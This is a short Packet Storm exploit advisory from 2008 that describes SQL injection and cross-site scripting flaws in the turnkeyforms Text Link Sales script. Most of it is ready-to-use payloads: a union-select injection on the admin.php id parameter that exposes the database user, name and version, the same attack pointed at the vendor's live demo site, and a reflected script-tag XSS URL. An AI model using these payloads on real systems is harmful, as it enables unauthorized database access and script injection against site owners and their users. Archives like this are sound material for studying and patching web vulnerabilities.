textlinksales-sqlxss.txt

2008-11-16T00:00:00
ID PACKETSTORM:71989
Type packetstorm
Reporter ZoRLu
Modified 2008-11-16T00:00:00

Description

                                        
                                            `[~] turnkeyforms Text Link Sales Remote Sql inj & xss  
[~]  
[~]----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 14.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: trt-turk@hotmail.com  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~]  
[~] my bug number now: 43  
[~]  
[~] my target bug number: 100  
[~]  
[~] -----------------------------------------------------------  
  
  
Exploit: sql inj  
  
http://localhost/script/admin.php?a=users&id=[SQL]  
  
  
[SQL]  
  
999+union+select+1,user(),database(),version(),5,6,7--  
  
  
sql for demo:  
  
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--  
  
  
xss:  
  
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id="><script>alert()</script>  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`